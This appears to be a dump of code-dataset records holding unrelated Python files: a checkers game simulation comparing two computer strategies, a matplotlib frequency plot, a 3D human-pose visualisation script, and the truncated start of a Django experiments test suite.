Kat\r\n\"\"\"\r\n#RUNNING MANY GAMES TO SEE THE BETTER COMPUTER METHOD\r\n\r\ndef main():\r\n import numpy as np\r\n import random\r\n \r\n #game board, 8 x 8\r\n def start_board(): #Create the board set-up with pieces in starting position\r\n board = []\r\n for i in range(8):\r\n board.append([' '] * 8) # 8 rows made of 8 empty strings. \r\n board[0][1] = 'O'\r\n board[0][3] = 'O'\r\n board[0][5] = 'O'\r\n board[0][7] = 'O'\r\n board[1][0] = 'O'\r\n board[1][2] = 'O'\r\n board[1][4] = 'O'\r\n board[1][6] = 'O'\r\n board[2][1] = 'O'\r\n board[2][3] = 'O'\r\n board[2][5] = 'O'\r\n board[2][7] = 'O'\r\n board[5][0] = 'X'\r\n board[5][2] = 'X'\r\n board[5][4] = 'X'\r\n board[5][6] = 'X'\r\n board[6][1] = 'X'\r\n board[6][3] = 'X'\r\n board[6][5] = 'X'\r\n board[6][7] = 'X'\r\n board[7][0] = 'X'\r\n board[7][2] = 'X'\r\n board[7][4] = 'X'\r\n board[7][6] = 'X'\r\n return board\r\n\r\n #this contains the \"rules\" for what kinds of moves are allowed. \r\n def valid_move_rules(board, marker, marker_king, xstart, ystart): \r\n #is a move to this space by this player legal? \r\n #should return true is this move can be made\r\n #define player's and opponent's pieces\r\n if marker == 'X': \r\n opponent = 'O'\r\n opponent_king = '0'\r\n player = 1\r\n elif marker == 'O':\r\n opponent = 'X'\r\n opponent_king = 'K'\r\n player = 2 \r\n piece = board[xstart][ystart] #assigns a marker to the piece\r\n #start move scenario to check if there are legal moves to make\r\n moves_to_make = [] \r\n mandatory_moves_to_make = []\r\n piece_to_capture = [] #if a move to make jumps over and captures a piece, the piece captured will be the move -1 in the direction it came grom and that space will be changed to empty\r\n if player == 1:\r\n if piece == marker: #piece is a pawn, can only move forward (up for X's)\r\n for xdirection, ydirection in [ [-1,-1], [-1,1]]: #the 2 ways this piece could moveS\r\n x = xstart\r\n y = ystart\r\n x = x + xdirection #check for diag moves\r\n y = y + ydirection\r\n if is_on_board(x, y) and board[x][y] == ' ':\r\n moves_to_make.append([x, y])\r\n elif is_on_board(x, y) and board[x][y] in (opponent, opponent_king): #move one more space in that direction to see if the piece can be jumped\r\n xjump = x + xdirection \r\n yjump = y + ydirection\r\n if is_on_board(xjump, yjump) and board[xjump][yjump] == ' ':\r\n moves_to_make.append([xjump, yjump])\r\n mandatory_moves_to_make.append([xjump, yjump])\r\n piece_to_capture.append([x, y]) #this stores the location of the capturable piece so it can be changed to ' ' later\r\n elif piece == marker_king: #piece is a king and can move in diag. forwards and back. \r\n for xdirection, ydirection in [ [-1,-1], [1,-1], [-1,1], [1,1]]: #the 4 ways this piece could moveS\r\n x = xstart\r\n y = ystart\r\n x = x + xdirection #check for diag moves\r\n y = y + ydirection\r\n if is_on_board(x, y) and board[x][y] == ' ':\r\n moves_to_make.append([x, y])\r\n elif is_on_board(x, y) and board[x][y] in (opponent, opponent_king):\r\n xjump = x + xdirection \r\n yjump = y + ydirection\r\n if is_on_board(xjump, yjump) and board[xjump][yjump] == ' ':\r\n moves_to_make.append([xjump, yjump])\r\n mandatory_moves_to_make.append([xjump, yjump])\r\n piece_to_capture.append([x, y])\r\n #player 2 can only move down the board so the x and y directions must be changed. \r\n elif player == 2:\r\n if piece == marker: \r\n for xdirection, ydirection in [ [1,-1], [1,1]]:\r\n x = xstart\r\n y = ystart\r\n x = x + xdirection \r\n y = y + ydirection\r\n if is_on_board(x, y) and board[x][y] == ' ':\r\n moves_to_make.append([x, y])\r\n elif is_on_board(x, y) and board[x][y] in (opponent, opponent_king):\r\n xjump = x + xdirection \r\n yjump = y + ydirection\r\n if is_on_board(xjump, yjump) and board[xjump][yjump] == ' ':\r\n moves_to_make.append([xjump, yjump])\r\n mandatory_moves_to_make.append([xjump, yjump])\r\n piece_to_capture.append([x, y]) \r\n elif piece == marker_king: #piece is a king, can move forwards and backwards \r\n for xdirection, ydirection in [ [-1,-1], [1,-1], [-1,1], [1,1]]: \r\n x = xstart\r\n y = ystart\r\n x = x + xdirection \r\n y = y + ydirection\r\n if is_on_board(x, y) and board[x][y] == ' ':\r\n moves_to_make.append([x, y])\r\n elif is_on_board(x, y) and board[x][y] in (opponent, opponent_king):\r\n xjump = x + xdirection \r\n yjump = y + ydirection\r\n if is_on_board(xjump, yjump) and board[xjump][yjump] == ' ':\r\n moves_to_make.append([xjump, yjump])\r\n mandatory_moves_to_make.append([xjump, yjump])\r\n piece_to_capture.append([x, y])\r\n if len(moves_to_make) == 0:\r\n return False #there were no valid moves\r\n return (piece_to_capture, moves_to_make, mandatory_moves_to_make)\r\n \r\n def is_move_valid(board, marker, marker_king, xstart, ystart): \r\n if valid_move_rules(board, marker, marker_king, xstart, ystart) != False:\r\n piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, xstart, ystart)\r\n if len(moves_to_make) == 0:\r\n return False\r\n else:\r\n return moves_to_make\r\n else:\r\n return False\r\n \r\n def get_possible_moves(board, marker, marker_king):\r\n #creates a list of ALL the possible moves this player can make \r\n #need to show only jump moves in the event of a jump opportunity\r\n possible_moves = []\r\n mandatory_moves = []\r\n for x in range(8):\r\n for y in range(8):\r\n if is_move_valid(board, marker, marker_king, x, y) != False: #this will look at every space on the board check if a move to this location would be a legal using the is move valid function. \r\n #if false, then there is no valid move to that space. \r\n piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, x,y)\r\n possible_moves = possible_moves + moves_to_make #this creates a list of all the possible moves. \r\n mandatory_moves = mandatory_moves + mandatory_moves_to_make\r\n if len(mandatory_moves) != 0:\r\n possible_moves = mandatory_moves\r\n return possible_moves\r\n \r\n def get_movable_pieces(board, marker, marker_king):\r\n #creates a list of all the possible moves this player can make \r\n #need to show only jump moves in the event of a jump opportunity\r\n movable_pieces = []\r\n mandatory_pieces = []\r\n for x in range(8):\r\n for y in range(8):\r\n if is_move_valid(board, marker, marker_king, x, y) != False: #this will look at every space on the board check if a move to this location would be a legal using the is move valid function. \r\n #if false, then there is no valid move to that space. \r\n movable_pieces.append([x,y]) #this creates a list of all the possible moves. \r\n piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, x,y)\r\n if len(mandatory_moves_to_make) != 0:\r\n mandatory_pieces.append([x,y])\r\n if len(mandatory_pieces) != 0:\r\n movable_pieces = mandatory_pieces\r\n for x in range(8):\r\n for y in range(8):\r\n for x, y in movable_pieces:\r\n if x > (x+1) or x < (x-1): #if the x val changes by more than 1, that means a piece could be jumped\r\n mandatory_pieces.append([x,y])\r\n if len(mandatory_pieces) != 0:\r\n movable_pieces = mandatory_pieces\r\n return movable_pieces\r\n \r\n def make_move(board, marker, marker_king, xstart, ystart, xnew, ynew): \r\n if board[xstart][ystart] == marker:\r\n board[xnew][ynew] = marker\r\n board[xstart][ystart] = ' '\r\n if board[xstart][ystart] == marker_king:\r\n board[xnew][ynew] = marker_king\r\n board[xstart][ystart] = ' '\r\n \r\n def capture_piece(board, marker, marker_king, xstart, ystart, xnew, ynew):\r\n #give location of piece that was captured\r\n if xnew == (xstart + 2):\r\n if ynew == (ystart + 2):\r\n board[(xstart+1)][(ystart+1)] = ' '\r\n if ynew == (ystart - 2):\r\n board[(xstart+1)][(ystart-1)] = ' '\r\n elif xnew == (xstart - 2):\r\n if ynew == (ystart + 2):\r\n board[(xstart-1)][(ystart+1)] = ' '\r\n if ynew == (ystart - 2):\r\n board[(xstart-1)][(ystart-1)] = ' '\r\n #this will be part of updating the board during gameplay\r\n \r\n def opposite_end(marker, xnew, ynew):\r\n #has the player's piece reached the opposite end of the board? true for p1 if in row 0 and for p2 if in row 7. This is part 1 of determining if the piece will become a king\r\n #note*limiting the piece to one that is not already a king prevents the computer from just moving one king piece back and forth the whole time\r\n if marker == 'X':\r\n if xnew == 0:\r\n return True\r\n else:\r\n return False\r\n if marker == 'O':\r\n if xnew == 7:\r\n return True\r\n else:\r\n return False\r\n \r\n def piece_becomes_king(board, marker, marker_king, xstart, ystart, xnew, ynew):\r\n #if the piece has reached the end of the board, it will become a king. If this is true, then in the gameplay, we will create an if loop where if this is true, then marker becomes marker_king. \r\n if board[xstart][ystart] == marker_king:\r\n return False\r\n if opposite_end(marker, xnew, ynew) == True:\r\n board[xnew][ynew] = marker_king\r\n return True #keeps pieces that are already kings from being marked as becoming a king \r\n \r\n def get_computer_move_1(board, marker, marker_king):\r\n pieces = get_movable_pieces(board, marker, marker_king) \r\n move_info = [] #this will contain the position of both the piece start and end location for a move. \r\n king_move_info = [] #groups moves that would give the player a king piece\r\n for x, y in pieces:\r\n xstart = x\r\n ystart = y\r\n piece = [xstart, ystart]\r\n if valid_move_rules(board, marker, marker_king, xstart, ystart) == False:\r\n break\r\n piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, xstart, ystart)\r\n if len(mandatory_moves_to_make) != 0:\r\n moves_to_make = mandatory_moves_to_make\r\n for x, y in moves_to_make:\r\n xnew = x\r\n ynew = y\r\n move = [xnew, ynew]\r\n move_info.append([piece, move]) #many pieces will have two moves that they can make. This way, if a piece can make 2 moves, there will be a [piece,move] for each\r\n if piece_becomes_king(board, marker, marker_king, xstart, ystart, xnew, ynew) == True:\r\n king_move_info.append([piece, move])\r\n if len(king_move_info) != 0:\r\n move_info = king_move_info #A move that will get the computer a king piece will always be chosen if available and legal to make.\r\n [xstart, ystart], [xnew, ynew] = random.choice(move_info) #this will pick a random move in the list of move_info. A move that will get the computer a king piece. It will also redefine and select the computer's x/y start and end ('new') values\r\n return xstart, ystart, xnew, ynew\r\n \r\n def get_computer_move_2(board, marker, marker_king):\r\n pieces = get_movable_pieces(board, marker, marker_king) \r\n move_info = [] \r\n end_space = []\r\n #move pieces toward the middle and help the computer control the center of the board\r\n for x, y in pieces:\r\n xstart = x\r\n ystart = y\r\n piece = [xstart, ystart]\r\n piece_to_capture, moves_to_make, mandatory_moves_to_make = valid_move_rules(board, marker, marker_king, xstart, ystart)\r\n if len(mandatory_moves_to_make) != 0:\r\n moves_to_make = mandatory_moves_to_make\r\n for x, y in moves_to_make:\r\n xnew = x\r\n ynew = y\r\n move = [xnew, ynew]\r\n move_info.append([piece, move])\r\n for x in range(len(move_info)):\r\n end_space.append(move_info[x][1])\r\n #find which move will put the player closest to the center \r\n center = [3,4] #approx center of board\r\n end = np.array(end_space)#make a copy of end_space\r\n end = np.abs(end - center) #get list of closeness to center\r\n end = np.min(end, axis=1)\r\n find = np.min(end, axis=0) #which one is closest\r\n val = end.tolist().index(find) #pull location of closest end space in list\r\n [xstart, ystart], [xnew, ynew] = move_info[val] #use location to get closet ending move\r\n return xstart, ystart, xnew, ynew\r\n \r\n def get_computer_move(comp_level, board, marker, marker_king):\r\n if comp_level == 1:\r\n xstart, ystart, xnew, ynew = get_computer_move_1(board, marker, marker_king)\r\n if comp_level == 2:\r\n xstart, ystart, xnew, ynew = get_computer_move_2(board, marker, marker_king)\r\n return xstart, ystart, xnew, ynew\r\n \r\n def get_winner(board):\r\n #how many pieces are left on the board...\r\n player1_pieces = 0\r\n player2_pieces = 0 \r\n for x in range (8):\r\n for y in range(8):\r\n if board[x][y] == 'X':\r\n player1_pieces = player1_pieces + 1\r\n if board[x][y] == 'K':\r\n player1_pieces = player1_pieces + 2\r\n #this is because in checkers, a 'king' piece is 2 stacked regular pieces. so you essentiall win back a piece\r\n if board[x][y] == 'O':\r\n player2_pieces = player2_pieces + 1\r\n if board[x][y] == '0':\r\n player2_pieces = player2_pieces + 2\r\n if player2_pieces > player1_pieces:\r\n winner = 'Player 2 wins!'\r\n if player2_pieces < player1_pieces:\r\n winner = 'Player 1 wins!'\r\n elif player2_pieces == player1_pieces:\r\n winner = \"It's a tie!\"\r\n return winner\r\n \r\n \r\n ###################################################################\r\n \r\n player1_type = 'comp'\r\n p1comp_level = 1\r\n player2_type = 'comp'\r\n p2comp_level = 2\r\n \r\n player1_marker = 'X'\r\n player2_marker = 'O'\r\n player1_marker_king = 'K'\r\n player2_marker_king = '0'\r\n\r\n turn = 1 \r\n game_board = start_board()\r\n game_over = False \r\n \r\n while not game_over:\r\n if (turn % 2) != 0: #first turn is 1, which is odd. \r\n possible_moves = get_possible_moves(game_board, player1_marker, player1_marker_king)\r\n if len(possible_moves) == 0:\r\n game_over = True\r\n break \r\n if player1_type == 'human': #get the human's move\r\n pass\r\n if player1_type == 'comp':\r\n xstart, ystart, xnew, ynew = get_computer_move(p1comp_level, game_board, player1_marker, player1_marker_king)\r\n make_move(game_board, player1_marker, player1_marker_king, xstart, ystart, xnew, ynew)\r\n capture_piece(game_board, player1_marker, player1_marker_king, xstart, ystart, xnew, ynew)\r\n piece_becomes_king(game_board, player1_marker, player1_marker_king, xstart, ystart, xnew, ynew)\r\n turn = turn + 1\r\n if (turn % 2) == 0:\r\n possible_moves = get_possible_moves(game_board, player2_marker, player2_marker_king)\r\n if len(possible_moves) == 0:\r\n game_over = True\r\n break\r\n if player2_type == 'human':\r\n pass\r\n if player2_type == 'comp': \r\n xstart, ystart, xnew, ynew = get_computer_move(p2comp_level, game_board, player2_marker, player2_marker_king)\r\n make_move(game_board, player2_marker, player2_marker_king, xstart, ystart, xnew, ynew)\r\n capture_piece(game_board, player2_marker, player2_marker_king, xstart, ystart, xnew, ynew)\r\n piece_becomes_king(game_board, player2_marker, player2_marker_king, xstart, ystart, xnew, ynew)\r\n turn = turn + 1 \r\n winner = get_winner(game_board)\r\n return winner\r\n\r\np1wins = 0\r\np2wins = 0\r\ntie = 0\r\n\r\nfor i in range(100):\r\n winner = main()\r\n gamenum = i + 1\r\n if winner == 'Player 1 wins!':\r\n p1wins = p1wins + 1\r\n if winner == 'Player 2 wins!':\r\n p2wins = p2wins + 1\r\n else:\r\n tie = tie + 1\r\n\r\nprint(gamenum, 'games. p1 won', p1wins, 'p2 won', p2wins)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":18410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121513791","text":"import string\nimport matplotlib.pyplot as plt\n\nf = open(\"../../../stats.txt\")\nfrequency = []\nprobability = []\n\n# get just the words frequency\nfor line in f:\n data = string.split(line, \" \")\n\n # ignore the last character (\\n)\n frequency.append((int)(data[1]))\n probability.append((float)(data[2][:-1]))\n\n# y = f(x) -> prob = f(freq)\nplt.plot(frequency, probability, linestyle='---', marker='o', color='r')\n# plt.scatter(frequency, probability)\nplt.gca().invert_xaxis()\nplt.ylabel(\"Probability\")\nplt.xlabel(\"Frequency\")\n\n# plt.show()\nplt.savefig('graph.png', dpi=200)\n","sub_path":"src/week1/plotting/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441340484","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport os\nimport cv2\nimport random\nimport os.path as osp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import Axes3D\nplt.switch_backend('agg')\nplt.ioff()\n\nimport h5py\nfrom tqdm import trange\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--seq_num', type=int, default=1, help='Specify the number of sequences to render')\nparser.add_argument('--save_dir', type=str, default=\"../vis/\", help='Specify the directory the save the visualization')\nparser.add_argument('--in_filename', type=str, default= \"../data/h36m_valid_pred_3d.h5\", help=\"Speicfy the dataset to load from\")\nargs = parser.parse_args()\nseq_num = args.seq_num \nsave_dir = args.save_dir\nin_filename = args.in_filename\nos.makedirs(save_dir, exist_ok=True)\n\nv3d_to_ours = [3, 2, 1, 4, 5, 6, 16, 15, 14, 11, 12, 13, 8, 0, 7, 9, 10]\npairs = [(0, 1), (1, 2), (2, 13), (3, 13), (3, 4), (4, 5), (6, 7), (7, 8), (8, 12), (9, 10),(9, 12), (10, 11),(12, 14), (12, 15), (13, 14), (15, 16)]\npairs_left = [(3, 13), (3, 4), (4, 5), (9, 10), (9, 12), (10, 11)]\npairs_right = [(0, 1), (1, 2), (2, 13), (6, 7), (7, 8), (8, 12)]\n\ncolors = {\n 'pink': np.array([197, 27, 125]), # L lower leg\n 'light_pink': np.array([233, 163, 201]), # L upper leg\n 'light_green': np.array([161, 215, 106]), # L lower arm\n 'green': np.array([77, 146, 33]), # L upper arm\n 'red': np.array([215, 48, 39]), # head\n 'light_red': np.array([252, 146, 114]), # head\n 'light_orange': np.array([252, 141, 89]), # chest\n 'purple': np.array([118, 42, 131]), # R lower leg\n 'light_purple': np.array([175, 141, 195]), # R upper\n 'light_blue': np.array([145, 191, 219]), # R lower arm\n 'blue': np.array([69, 117, 180]), # R upper arm\n 'gray': np.array([130, 130, 130]), #\n 'white': np.array([255, 255, 255]), #\n}\njcolors = [\n 'light_pink', 'light_pink', 'light_pink', 'pink', 'pink', 'pink',\n 'light_blue', 'light_blue', 'light_blue', 'blue', 'blue', 'blue',\n 'purple', 'purple', 'red', 'green', 'green', 'white', 'white'\n]\necolors = {\n 0: 'light_pink',\n 1: 'light_pink',\n 2: 'light_pink',\n 3: 'pink',\n 4: 'pink',\n 5: 'pink',\n 6: 'light_blue',\n 7: 'light_blue',\n 8: 'light_blue',\n 9: 'blue',\n 10: 'blue',\n 11: 'blue',\n 12: 'purple',\n 13: 'light_green',\n 14: 'light_green',\n 15: 'purple'\n}\n\nroot = \"/yzbdata/MeshTrack/Data/HMR/Human/Subject/\"\nimage_root = osp.join(root, \"datapre_all\")\n\nin_filename = \"../data/h36m_valid_pred_3d4118.h5\"\nin_filename_ssadv = \"../data/h36m_valid_pred_3dssadv.h5\"\n\nprint(\"Read from\", in_filename)\nf = h5py.File(in_filename, \"r\")\nimagenames = [name.decode() for name in f['imagename'][:]]\n# 2d joints in the order of v3d convention\n# poses2d = np.array(f['joint_2d_gt'])[:, v3d_to_ours]\nposes2d = np.array(f['joint_2d_gt'])\nposes3d = np.array(f['joint_3d_pre'])\nposes3d_gt = np.array(f['joint_3d_gt'])\nposes3d_gt = poses3d_gt - poses3d_gt[:, 13:14]\nf.close()\n\nf = h5py.File(in_filename_ssadv, \"r\")\nposes3d_ssadv = np.array(f['joint_3d_pre'])\nf.close()\n\nt = trange(0, len(imagenames))\nprocessed_video_names = []\n\ndef plot_skeleton_2d(all_frames, joints_2d): \n out_frames = []\n radius = max(4, (np.mean(all_frames[0].shape[:2]) * 0.01).astype(int))\n for idx in range(len(all_frames)): \n for pair in pairs: \n i, j = pair \n pt1, pt2 = joints_2d[idx, i], joints_2d[idx, j] \n x11, y11 = pt1 \n x22, y22 = pt2 \n if pair in pairs_left: \n color = (205, 0, 0)\n elif pair in pairs_right: \n color = (0, 205, 0)\n else: \n color = (0, 165, 255)\n cv2.line(all_frames[idx], (int(x11), int(y11)), (int(x22), int(y22)), color, radius-2)\n \ndef get_xxyys(names): \n xxyys = []\n # should be subject, action, camera\n splits = names[0].split('/')\n video_name = '/'.join(splits[:-1])\n part_label_path = osp.join(root, splits[0], 'MySegmentsMat', 'PartLabels',\n splits[1] + (\"cam\" + splits[2]).replace('cam0', '.54138969').replace('cam2','.58860488').replace('cam1', '.55011271').replace('cam3', '.60457274') + \".mat\")\n f = h5py.File(part_label_path, \"r\")\n for idx, name in enumerate(names): \n partmask = f[f['Feat'][idx*30, 0]][()].T \n yp, xp = np.where(partmask != 0)\n xmin, xmax = np.min(xp), np.max(xp) + 1 \n ymin, ymax = np.min(yp), np.max(yp) + 1 \n xxyys.append((xmin, xmax, ymin, ymax))\n f.close()\n return xxyys\n\ndef crop_image(all_frames, xxyys, scale_factor=0.25): \n out_frames = []\n for frame, xxyy in zip(all_frames, xxyys): \n h, w = frame.shape[:2]\n xmin, xmax, ymin, ymax = xxyy \n xc, yc = (xmin + xmax) / 2, (ymin + ymax) / 2\n l = max(xmax - xmin, ymax - ymin)\n xmin, xmax = max(0, xc - l/2), min(w, xc + l / 2)\n ymin, ymax = max(0, yc - l/2), min(h, yc + l / 2)\n xmin, xmax = int(xmin), int(xmax)\n ymin, ymax = int(ymin), int(ymax)\n frame = frame[ymin:ymax, xmin:xmax, :].copy()\n frame = cv2.resize(frame, (int(scale_factor * w), int(scale_factor * h)))\n frame = frame[::-1, :, ::-1] / 255\n out_frames.append(frame)\n return out_frames\n\nfor imageid in t:\n name = imagenames[imageid]\n splits = name.split('/')\n video_name = '/'.join(splits[:3])\n if len(processed_video_names) == seq_num: \n print(\"Finished! Rendered {} sequences, saved to {}\".format(seq_num, save_dir))\n break\n if video_name in processed_video_names:\n continue \n else:\n processed_video_names.append(video_name)\n print(video_name)\n recs = [(idx, name) for idx, name in enumerate(imagenames) if video_name in name]\n # downsample \n recs = recs[::30]\n # cand_list = [x*5 for x in [440, 565, 770]]\n # cand_list = [200, 250, 300, 350, 400, 450, 500, 520, 550, 590, 620, 660, 700, 740, 770, 800, 830, 845]\n # recs = list(filter(lambda x: x[0] in cand_list, recs))\n # recs = list(filter(lambda x: x[0] in [65*5, 100*5, 905*5, 1160*5], recs))\n recs = sorted(recs, key=lambda x: int(x[1].split('/')[-1]))\n names_in_video = [rec[1] for rec in recs]\n indices_in_video = [rec[0] for rec in recs]\n path_format = osp.join(image_root, splits[0], splits[1].replace(' ', '_'), \"cam\" + splits[2], \"{:06d}.jpg\")\n poses3d_in_video = poses3d[indices_in_video]\n poses2d_in_video = poses2d[indices_in_video]\n poses3d_ssadv_in_video = poses3d_ssadv[indices_in_video]\n poses3d_gt_in_video = poses3d_gt[indices_in_video]\n all_frames = [cv2.imread(path_format.format(int(name.split('/')[-1])+1)) for name in names_in_video]\n print(\"Ploting 2d skeleton...\")\n plot_skeleton_2d(all_frames, poses2d_in_video)\n # scale_factor = 0.25\n # all_frames = [cv2.resize(frame, (int(scale_factor * frame.shape[1]), int(scale_factor * frame.shape[0])))[::-1, :, ::-1] / 255 for frame in all_frames]\n print(\"Getting bounding boxes...\")\n xxyys = get_xxyys(names_in_video)\n print(\"Cropping images...\")\n all_frames = crop_image(all_frames, xxyys, scale_factor=0.2)\n print(\"Generating gifs...\")\n\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111, projection='3d')\n ax.view_init(elev=10., azim=45.)\n lines_3d, lines_3d_gt = [], []\n lines_3d_ssadv = []\n radius = 0.75 \n initialized = False\n num_render = len(names_in_video)\n print(num_render, \" frames to plot\")\n\n def update_video(frame_idx):\n global initialized, lines_3d, lines_3d_gt, lines_3d_ssadv\n print(\"{}/{} \".format(frame_idx, num_render), end='\\r')\n pose2d = poses2d_in_video[frame_idx]\n pose3d = poses3d_in_video[frame_idx]\n pose3d_ssadv = poses3d_ssadv_in_video[frame_idx]\n pose3d_gt = poses3d_gt_in_video[frame_idx]\n if not initialized:\n for idx, pair in enumerate(pairs):\n i, j = pair\n if pair in pairs_left: \n color = \"blue\"\n elif pair in pairs_right: \n color = \"green\"\n else: \n color = \"darkorange\"\n # pt1, pt2 = pose3d[i], pose3d[j]\n # x11, y11, z11 = pt1\n # x22, y22, z22 = pt2\n # lines_3d.append(ax.plot([z11, z22], [x11, x22], [-y11, -y22], c='red', linewidth=3, label=\"pre\"))\n pt1, pt2 = pose3d_gt[i], pose3d_gt[j]\n x11, y11, z11 = pt1 \n x22, y22, z22 = pt2 \n lines_3d_gt.append(ax.plot([z11, z22], [x11, x22], [-y11, -y22], c=color, linewidth=3, label=\"gt\"))\n # pt1, pt2 = pose3d_ssadv[i], pose3d_ssadv[j]\n # x11, y11, z11 = pt1 \n # x22, y22, z22 = pt2\n # lines_3d_ssadv.append(ax.plot([z11, z22], [x11, x22], [-y11, -y22], c=\"red\", linewidth=3, label=\"ssadv\"))\n initialized = True\n else:\n for idx, pair in enumerate(pairs):\n i, j = pair\n # pt1, pt2 = pose3d[i], pose3d[j]\n # x11, y11, z11 = pt1\n # x22, y22, z22 = pt2\n # lines_3d[idx][0].set_xdata([z11, z22])\n # lines_3d[idx][0].set_ydata([x11, x22])\n # lines_3d[idx][0].set_3d_properties([-y11, -y22])\n pt1, pt2 = pose3d_gt[i], pose3d_gt[j]\n x11, y11, z11 = pt1\n x22, y22, z22 = pt2\n lines_3d_gt[idx][0].set_xdata([z11, z22])\n lines_3d_gt[idx][0].set_ydata([x11, x22])\n lines_3d_gt[idx][0].set_3d_properties([-y11, -y22])\n # pt1, pt2 = pose3d_ssadv[i], pose3d_ssadv[j]\n # x11, y11, z11 = pt1\n # x22, y22, z22 = pt2\n # lines_3d_ssadv[idx][0].set_xdata([z11, z22])\n # lines_3d_ssadv[idx][0].set_ydata([x11, x22])\n # lines_3d_ssadv[idx][0].set_3d_properties([-y11, -y22])\n\n xroot, yroot, zroot = pose3d_gt[13, 0], -pose3d_gt[13, 1], pose3d_gt[13, 2]\n ax.set_ylim3d([-radius+xroot, radius+xroot])\n ax.set_zlim3d([-radius+yroot, radius+yroot])\n ax.set_xlim3d([-2.5 * radius+zroot, radius+zroot])\n ax.get_xaxis().set_ticklabels([])\n ax.get_yaxis().set_ticklabels([])\n ax.set_zticklabels([])\n\n white = (1.0, 1.0, 1.0, 0.0)\n ax.w_xaxis.set_pane_color(white)\n ax.w_yaxis.set_pane_color(white)\n\n ax.w_xaxis.line.set_color(white)\n ax.w_yaxis.line.set_color(white)\n ax.w_zaxis.line.set_color(white)\n\n r = 0.95\n # radius = max(4, (np.mean(all_frames[0].shape[:2]) * 0.01).astype(int))\n xx = np.linspace(-r * radius + xroot, r * radius + xroot, all_frames[frame_idx].shape[1])\n yy = np.linspace(-r * radius + yroot, r * radius + yroot, all_frames[frame_idx].shape[0])\n xx, yy = np.meshgrid(xx, yy)\n zz = np.ones_like(xx) * (-3.2* radius + zroot)\n ax.set_xlabel('Z', fontsize=13)\n ax.set_ylabel(\"X\", fontsize=13)\n ax.set_zlabel(\"Y\", fontsize=13)\n ax.plot_surface(zz, xx, yy, rstride=1, cstride=1, facecolors=all_frames[frame_idx], shade=False)\n plt.savefig(osp.join(save_dir, f\"{video_name.replace('/', '_')}_{frame_idx}.png\"))\n\n for idx in range(len(names_in_video)): \n update_video(idx)\n ani = animation.FuncAnimation(fig, update_video, range(len(names_in_video)), interval=20)\n save_name = name.replace('/', '_')\n ani.save(osp.join(save_dir, f\"{save_name}.gif\"), writer='imagemagick', fps=20)\n t.set_postfix(index=int(imageid))\n","sub_path":"body/human_pose/ambiguity_aware/scripts/plot1.py","file_name":"plot1.py","file_ext":"py","file_size_in_byte":11678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"412681508","text":"from django.http import HttpResponse\nfrom django.test import TestCase, RequestFactory\nfrom django.contrib.sessions.backends.db import SessionStore as DatabaseSession\n\nfrom unittest import TestSuite\n\nfrom experiments import conf\nfrom experiments.experiment_counters import ExperimentCounter\nfrom experiments.middleware import ExperimentsRetentionMiddleware\nfrom experiments.signal_handlers import transfer_enrollments_to_user\nfrom experiments.utils import DummyUser, SessionUser, AuthenticatedUser, participant\nfrom experiments.models import Experiment, ENABLED_STATE, Enrollment\n\nfrom django.contrib.auth import get_user_model\n\nTEST_ALTERNATIVE = 'blue'\nEXPERIMENT_NAME = 'backgroundcolor'\n\n\nclass WebUserIncorporateTestCase(object):\n def __init__(self, *args, **kwargs):\n super(WebUserIncorporateTestCase, self).__init__(*args, **kwargs)\n self.experiment_counter = ExperimentCounter()\n\n def test_can_incorporate(self):\n self.incorporating.incorporate(self.incorporated)\n\n def test_incorporates_enrollment_from_other(self):\n if not self._has_data():\n return\n\n try:\n experiment = Experiment.objects.create(name=EXPERIMENT_NAME, state=ENABLED_STATE)\n self.incorporated.set_alternative(EXPERIMENT_NAME, TEST_ALTERNATIVE)\n self.incorporating.incorporate(self.incorporated)\n self.assertEqual(self.incorporating.get_alternative(EXPERIMENT_NAME), TEST_ALTERNATIVE)\n finally:\n self.experiment_counter.delete(experiment)\n\n def _has_data(self):\n return not isinstance(self.incorporated, DummyUser) and not isinstance(self.incorporating, DummyUser)\n\n\ndef dummy(incorporating):\n return DummyUser()\n\n\ndef anonymous(incorporating):\n return SessionUser(session=DatabaseSession())\n\n\ndef authenticated(incorporating):\n User = get_user_model()\n return AuthenticatedUser(user=User.objects.create(username=['incorporating_user', 'incorporated_user'][incorporating]))\n\n\nclass Dummy2DummyIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Dummy2DummyIncorporateTestCase, self).setUp()\n self.incorporating = dummy(True)\n self.incorporated = dummy(False)\n\n\nclass Dummy2AnonymousIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Dummy2AnonymousIncorporateTestCase, self).setUp()\n self.incorporating = dummy(True)\n self.incorporated = anonymous(False)\n\n\nclass Dummy2AuthenticatedIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Dummy2AuthenticatedIncorporateTestCase, self).setUp()\n self.incorporating = dummy(True)\n self.incorporated = authenticated(False)\n\n\nclass Anonymous2DummyIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Anonymous2DummyIncorporateTestCase, self).setUp()\n self.incorporating = anonymous(True)\n self.incorporated = dummy(False)\n\n\nclass Anonymous2AnonymousIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Anonymous2AnonymousIncorporateTestCase, self).setUp()\n self.incorporating = anonymous(True)\n self.incorporated = anonymous(False)\n\n\nclass Anonymous2AuthenticatedIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def 